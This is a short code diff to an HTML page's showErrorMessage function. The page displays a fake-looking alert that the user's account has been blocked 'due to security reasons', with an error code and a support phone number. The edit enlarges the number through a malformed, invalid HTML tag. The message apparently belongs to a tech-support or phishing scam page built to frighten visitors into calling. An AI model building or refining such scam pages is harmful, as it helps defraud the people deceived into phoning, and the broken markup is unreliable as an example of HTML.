--- a/index.html
+++ b/index.html
@@ -243,7 +243,7 @@
         function showErrorMessage() {
             const errorMessage = document.getElementById('error-message');
             errorMessage.style.display = 'block';
-            errorMessage.innerHTML = 'Error Code : 00X47800. <br> Your account has been blocked due to security reasons. <br> Contact Support: <a href="tel:+18444991812"><b>+1-844-499-1812</b></a>';
+            errorMessage.innerHTML = 'Error Code : 00X47800. <br> Your account has been blocked due to security reasons. <br> Contact Support: <a href="tel:+18444991812"><b><font-size:20px;>+1-844-499-1812</b></a>';
         }
 
         // Handle form submission
